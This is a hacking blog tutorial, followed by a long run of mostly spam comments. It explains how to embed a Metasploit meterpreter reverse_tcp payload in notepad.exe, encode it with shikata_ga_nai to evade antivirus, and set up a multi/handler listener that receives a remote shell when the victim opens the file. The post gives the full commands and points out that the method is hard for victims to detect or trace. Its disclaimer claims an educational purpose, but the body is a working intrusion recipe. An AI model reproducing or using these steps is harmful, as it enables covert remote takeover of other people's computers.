hacking Windows remotely with exploited executable

1. The articles contained on the website are for educational purposes only encouraging users and Admins to better understand the environmental security measurement and enable safer digital environment. Geek-KB.com does not encourage, condone, or orchestrate attempts of hacking into other servers or any other illegal activities. All actions taken by users are strictly independent of Geek-KB.com. We are not responsible for any misuse of the techniques listed on this website. 2. Geek-KB.com has the sole discretion to remove/edit users, articles, external resources, or any other user-submitted content to protect itself from legal harm. This legal disclaimer may be modified at any time without notice. 3. Any damage caused by using any of the techniques taken from http://p2847-48- 527.s48.upress.link is at your own risk and responsibility;

How To: hacking windows remotely with an exploited executable file

hacking Windows

hacking Windows like a pro

 

System Requirements:

  1. Linux machine, you can download Backtrack 5 which already includes everything you need for this How To from http://www.backtrack-linux.org/downloads/
  2. Metaspolit Framework installed, Metasploit can be downloaded from http://www.rapid7.com/products/metasploit/download.jsp

In this article, How To: Create an exploited executable file in order to remotely hack a Windows machine I will teach you how to exploit an executable file which will be sent to your target windows computer and will gain you full access privileges after running the executable file.

Pre-Requirements:

  • A Linux machine installed with MetaSploit framework
  • A target Windows machine
  • An executable file (In this example I will use notepad.exe)

Let’s Begin!

The type of exploit i’m going to use is called reverse_tcp, it means that when the user will run the exploited executable a tcp/ip session will be opened from the target computer to your local computer.
The fact that the session is opened reversely will make it much harder for the attacked person to realize that he is actually being attacked as well as identifying the source of the attack.

First, run `msfconsole` from your terminal:

hacking Windows – Geek-KB.com

We will begin with setting the payload to the exploited executable:

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.15.250 LPORT=2222 R | msfencode -e x86/shikata_ga_nai -c 5 -t exe -x /mnt/shared/notepad.exe -o ~itaig/notepad_exp.exe
hacking Windows

hacking Windows – Geek-KB.com

The payload I chose is ‘windows/meterpreter/reverse_tcp’ , Then I’ve set the IP and Port of my own machine so that the tcp/ip session which will be opened, will connect to this IP in this Port. Using ‘msfencode’ , I’ve chosen the Shikata Ga Nai algorithm while pointing to the source executable file I’d like to set the payload on and the target executable file which will be sent to the target machine. The assumption behind encoded payloads is that fewer anti-virus products will pick up on them. Standard signature detection will be defeated, so the anti-virus program must either unpack the payloads statically, or run the applications dynamically in a sandbox and monitor their behaviour.

We have now finished working on the files and we’ll now set the corresponding settings on the local machine in order to start the listener. These are the commands I’ve use:

hacking Windows

hacking Windows – Geek-KB.com

 msf> use exploit/multi/handler

Sets msf to work with multi handler exploit.

 msf> set payload windows/meterpreter/reverse_tcp

Sets the payload to match a windows 7 machine and use reverse_tcp.

 msf> set LHOST 192.168.15.250

Sets my own computer’s IP address, the target computer (the one we want to hack) will connect to this IP, it’s the same IP which is also embedded in the exploited file i created.

 msf> set LPORT 443

Sets my own computer’s port, the target computer will connect to this port. You can choose any port you wish between 1-65k but a port which is lower than 1024 is the preferred because then it would be harder to identify the hack.

 msf> exploit

Starting the listener, waiting for the user on the target machine to double click the file. Once the user on the target machine runs the exploited file, a tcp/ip connection will be established between both computers while the issuer of the session is the attacked machine.

You can find more information about the next steps in my article How To: Generate a payloaded executable using Metasploit and hacking windows.

Enjoy and feel free to leave comments or ask questions.

1. Geek-KB.com does not encourage, condone, or orchestrate attempts to hack into other servers or any other illegal activities. The articles contained inside this website are for entertainment / educational purposes only, and what actions people decide to take outside of this website are strictly independent of Geek-KB.com. We are not responsible if you break the law using techniques listed on this website.

2. Geek-KB.com has the sole discretion to remove/edit users, articles, external resources, or any other user-submitted content to protect itself from legal harm. This legal disclaimer may be modified at any time without notice.

3. Any damage caused by using any of the techniques taken from http://www.geek-kb.com is on your own responsibility, Use it at your own risk!

Comments

comments

48 Comments

  1. www.youtube.com on January 11, 2014 at 12:18 am

    Where could I find additional info elsewhere?

  2. google plus and facebook on January 15, 2014 at 8:32 am

    My partner and I stumbled over here coming from
    a different web page and thought I might check things out.
    I like what I see so now i’m following you. Look forward to looking into your
    web page for a second time.

  3. gojiactivesbrazil.webs.com on January 21, 2014 at 2:12 am

    Keep this going please, great job!

  4. capsules de café vert on January 21, 2014 at 2:57 am

    This is really attention-grabbing, You’re an overly
    skilled blogger. I’ve joined your feed and look forward to in quest of extra of
    your wonderful post. Also, I’ve shared your site in
    my social networks

  5. Name on January 24, 2014 at 7:28 am

    Fantastic goods from you, man. I have understand your stuff previous to and you are just too magnificent.
    I really like what you’ve acquired here, certainly like what
    you are saying and the way in which you say it.

    You make it enjoyable and you still take care of to keep it
    wise. I can’t wait to read far more from you. This is really a tremendous site.

  6. my site on January 25, 2014 at 7:53 am

    Hi, I think your website might be having browser compatibility issues.
    When I look at your blog in Opera, it looks fine but when opening in Internet Explorer, it has
    some overlapping. I just wanted to give you a quick heads up!
    Other then that, wonderful blog!

  7. วิเคราะห์บอล on January 25, 2014 at 10:23 am

    I just like the helpful info you provide for your articles.
    I will bookmark your blog and test once more right here regularly.

    I am reasonably certain I will learn lots of new stuff right here!
    Best of luck for the following!

  8. ragnarok on January 25, 2014 at 6:21 pm

    Quality posts is the main to invite the users to visit the site, that’s what
    this web page is providing.

  9. รับทำ seo on January 25, 2014 at 7:42 pm

    I’m not sure where you’re getting your info, but good topic.

    I needs to spend some time learning more or understanding more.
    Thanks for wonderful information I was looking for this information for my mission.

  10. แทงบอลออนไลน์ on January 25, 2014 at 9:31 pm

    It’s not my first time to visit this site, i am visiting this website daily and take fastidious information from here everyday.

  11. Vernita on January 25, 2014 at 9:49 pm

    I read this paragraph fully concerning the resemblance of hottest and earlier technologies, it’s remarkable article.

  12. Chiq on January 25, 2014 at 11:48 pm

    Hi I am so glad I found your web site, I really found you
    by mistake, while I was searching on Digg for something else, Regardless
    I am here now and would just like to say cheers for a marvelous post
    and a all round exciting blog (I also love the theme/design), I don’t have time to read through it all at
    the moment but I have saved it and also added in your RSS feeds,
    so when I have time I will be back to read more, Please do keep up the superb jo.

  13. รับทำ seo on January 26, 2014 at 1:37 am

    I am in fact glad to glance at this blog posts which includes plenty of
    useful facts, thanks for providing these information.

  14. Alissa on January 26, 2014 at 2:28 am

    Great info. Lucky me I came across your blog by
    chance (stumbleupon). I’ve book-marked it for later!

  15. Mariana on January 26, 2014 at 6:54 am

    I have read some excellent stuff here. Certainly price
    bookmarking for revisiting. I surprise how much attempt
    you set to make this kind of great informative web site.

  16. Isabella on January 26, 2014 at 7:36 am

    Every weekend i used to visit this web page, for the reason that i want enjoyment, since this this web site conations actually nice funny information too.

  17. Frances on January 26, 2014 at 3:51 pm

    I absolutely love your blog and find nearly all of your post’s to be
    precisely what I’m looking for. can you
    offer guest writers to write content to suit your needs?
    I wouldn’t mind producing a post or elaborating on a lot of the subjects you write
    about here. Again, awesome web site!

  18. Morgan on January 26, 2014 at 8:16 pm

    I have read so many articles regarding the blogger lovers but this post is actually a
    nice paragraph, keep it up.

  19. รับทำ on January 27, 2014 at 9:45 am

    Hello there! This is my 1st comment here so I just wanted to give a quick shout out and tell you I really enjoy reading your posts.
    Can you suggest any other blogs/websites/forums that cover the same subjects?
    Thanks a ton!

  20. dialoguèrent on January 27, 2014 at 8:19 pm

    Hey just wanted to give you a quick heads up. The text in your article seem to be running off
    the screen in Ie. I’m not sure if this is a formatting issue or something to do with web
    browser compatibility but I figured I’d post to let you know.

    The layout look great though! Hope you get the issue fixed soon.
    Thanks

  21. รับทำ on January 27, 2014 at 8:42 pm

    Woah! I’m really loving the template/theme of this website.
    It’s simple, yet effective. A lot of times it’s difficult to get that “perfect balance” between usability and appearance.
    I must say that you’ve done a awesome job with this.
    Also, the blog loads very fast for me on Firefox.
    Outstanding Blog!

  22. muhammad on January 27, 2014 at 8:53 pm

    Howdy! This is my 1st comment here so I just wanted to give a
    quick shout out and tell you I genuinely enjoy reading
    your blog posts. Can you suggest any other blogs/websites/forums that
    deal with the same subjects? Thanks a ton!

  23. Natalie on January 27, 2014 at 9:09 pm

    Appreciating the time and energy you pput ino ykur site and in depth information you offer.
    It’s good to come achross a blog every once in a
    while that isn’t the same outdated rehashed material. Excellent read!

    I’ve bookmarked your site and I’m inclyding your RSS feeds
    to my Google account.

  24. รับทำ on January 28, 2014 at 6:30 am

    I really like your blog.. very nice colors & theme.
    Did you make this website yourself or did you hire someone
    to do it for you? Plz answer back as I’m looking to construct my own blog
    and would like to know where u got this from.

    thank you

  25. รับทำ on January 28, 2014 at 10:52 pm

    Hi, I do think this is an excellent web site. I stumbledupon it ;) I may revisit yet again since I bookmarked it.

    Money and freedom is the best way to change, may you be rich
    and continue to help others.

  26. bundesliga fox sports on January 29, 2014 at 3:34 am

    Thanks for sharing your info. I really appreciate your efforts and I am waiting for your next post
    thank you once again.

  27. Wilbert on January 30, 2014 at 5:19 am

    What’s up i am kavin, iits my firdt time to commenting anyplace, when i read this
    paragraph i thought i could also create comment due to thius sennsible piuece of writing.

  28. mariner finance reviews on January 30, 2014 at 9:02 am

    Fߋr the reason that the admin of this websіte is working, no quеstion
    very quickly it will be well-knօwn, ddue to its featuгe contents.

  29. Jerilyn on January 30, 2014 at 11:13 am

    Heya i am forr tɦe first time here. Icame across this board
    and I fіnd It truly useful & it helƿed me out much. І hope to
    giѵe something back and aid otheгs like you ɦelped me.

  30. Stephanie on January 30, 2014 at 11:50 am

    Hеlpfս info. Fortunate me I discovered your website bby chance, annd
    I’m surprised whyү this twist of ffate didn’t toook ρlace in advance!
    I bookmarked it.

  31. Mike on January 31, 2014 at 10:35 pm

    Hi there, just wanted to mention, I loved this article.
    It was helpful. Keep on posting!

  32. Learn more on February 7, 2014 at 2:15 am

    Very descriptive post, I enjoyed that bit.
    Will there be a part 2?

  33. Aston on February 9, 2014 at 1:39 pm

    I all the time used to study article in news papers but now as I am a user of internet therefore from now I am using
    net for articles or reviews, thanks to web.

  34. Helen on February 9, 2014 at 4:47 pm

    I am extremely impressed with your writing skills
    as well as with the layout on your weblog. Is this a paid theme or
    did you modify it yourself? Either way keep up the excellent quality writing, it is rare
    to see a great blog like this one today.

  35. Dick on February 10, 2014 at 12:40 am

    You should tаke paгt іn a contest ffor oոе of the hіghest quality websites online.
    ӏ am goong to highly recommend tɦіs web site!

  36. Ashly on February 12, 2014 at 8:52 am

    I have read so many content concerning the blogger lovers
    but this article is truly a nice post, keep it up.

  37. Johann on February 12, 2014 at 9:55 am

    Having read this I believed it was rather informative.

    I appreciate you taking the time and effort to put this informative article together.
    I once again find myself personally spending a significant amount
    of time both reading and posting comments. But so what, it was still worth
    it!

  38. Genting on February 13, 2014 at 5:37 am

    This text is invaluable. Where can I find out more?

  39. Dale on February 13, 2014 at 9:07 am

    I’ve been browsing online more than three hours today, yet I never found any interesting article like yours.

    It’s pretty worth enough for me. Personally, if all web owners and bloggers made good content as you
    did, the internet will be much more useful than ever before.

  40. greentrustcash.com on February 13, 2014 at 3:50 pm

    Usefսl info. Fortuոawte me I found your site by accident,
    and I’m stunned wwhy this accident did nοt came about earlier!

    I bookmarked it.

  41. jysofa.co.kr on February 14, 2014 at 6:10 am

    Hi there i am kaѵin, its my first ߋccasion to
    commenting аnyplace, when і read this paragraph i
    thought i could also create commeոt due to this sensible article.

  42. ดัดฟัน on February 21, 2014 at 3:41 pm

    I really like what you guys tend to be up too. Such clever
    work and reporting! Keep up the awesome works guys I’ve incorporated you guys to my personal blogroll.

  43. Richard on February 24, 2014 at 12:12 pm

    I know this website provides quality depending posts and additional stuff, is there any other web page which gives such things in quality?

  44. Jannes on February 27, 2014 at 12:18 pm

    Generally I don’t read post on blogs, but I wish to say that this
    write-up very forced me to check out and do it!
    Your writing taste has been surprised me.
    Thanks, quite nice post.

Leave a Comment

You must be logged in to post a comment.